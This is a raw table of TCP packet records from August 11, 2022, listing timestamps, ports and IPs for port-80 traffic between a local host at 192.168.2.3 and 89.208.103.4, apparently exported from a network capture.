Aug 11, 2022 06:57:08.392761946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392874956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392913103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.393023968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.393033028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.393059969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.393078089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.393084049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.393099070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.393129110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.393163919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406724930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406780958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406821012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406826973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406850100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406851053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406867981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406888008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406913996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406925917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406933069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.406963110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.406980038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407001972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407015085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407041073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407054901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407078981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407104969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407130003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407557011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407599926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407640934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407663107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407711029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407751083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407774925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407788038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407800913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407824993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407840014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407864094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407893896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407908916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407946110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407948017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.407963037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.407984018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408006907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408021927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408031940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408060074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408097982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408113956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408126116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408135891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408139944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408174038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408210039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408233881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408241987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408248901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408257961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408287048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408298969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408358097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408365965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408395052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408415079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408432961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408437967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408471107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408482075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408510923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408516884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408549070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408574104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408588886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408611059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408616066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.408628941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.408698082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.657495975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714457035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714509964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714550018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714551926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714589119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714627981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714633942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714667082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714668036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714673042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714700937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.714701891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714742899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.714754105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.727896929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.727963924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.727999926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728003979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.728033066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728041887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.728046894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728080034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.728096962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728116989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.728127956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728147984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.728171110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.728200912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729392052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729430914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729465008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729469061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729485035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729501009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729537010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729546070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729572058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729574919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729590893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729614019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729640961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729650021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729659081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729687929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729715109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729724884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729732990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729763985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729778051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729803085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729820013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729839087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729866982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.729870081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.729886055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.730488062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746206999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746249914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746288061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746296883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746325016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746325970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746351004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746362925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746381044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746402025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746417046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746433973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746465921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746471882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746476889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746510983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746532917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746548891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746562004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746587038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746603966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746623039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746639967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746664047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746669054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746718884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746721983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746764898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746781111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746803045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746810913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746839046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746855021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746877909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746886969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746915102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746929884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746952057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.746964931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.746990919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747014999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747025967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747042894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747064114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747071028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747102976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747119904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747138977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747150898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747175932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747193098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747214079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747225046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747250080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747265100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747287989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747304916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747325897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747342110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747380018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747401953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747442961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747456074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747482061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747498035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747520924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747539997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747558117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.747567892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.747613907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.752453089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.752495050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.752536058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.752553940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.752568007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.752573013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.752597094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.752613068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.753958941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.754017115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.754021883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.754057884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.754070997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.754148006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761713982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761766911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761806011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761832952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761843920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761861086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761881113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761905909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761919975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761941910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761960030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.761971951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.761998892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762012959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762037992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762063026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762073994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762084961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762111902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762129068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762162924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762177944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762216091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762229919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762253046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762276888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762289047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762301922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762327909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762346029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762367010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762377977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762403011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762415886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762440920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762459993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762479067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762490034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762517929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762554884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762576103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762588978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762592077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762607098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762629986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762634039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762669086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762695074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762705088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762718916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762742996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762768030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762779951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762804985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762816906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762835026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762855053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762871981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762892008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762919903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762929916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762932062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.762969017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.762996912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.763009071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.763024092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.763046980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.763072968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.763097048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.770126104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.770179033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.770216942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.770353079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.770414114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.770421028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.770797968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.770836115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.770860910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.770879984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771298885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771338940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771404028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771487951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771492004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771533012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771572113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771579027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771584988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771588087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771599054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771610975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771617889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771670103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771888018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771928072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771950960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.771965027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.771970034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772002935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772022009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772039890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772048950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772078037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772088051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772115946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772125006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772154093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772164106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772190094 CEST	80	49736	89.208.103.4	192.168.2.3
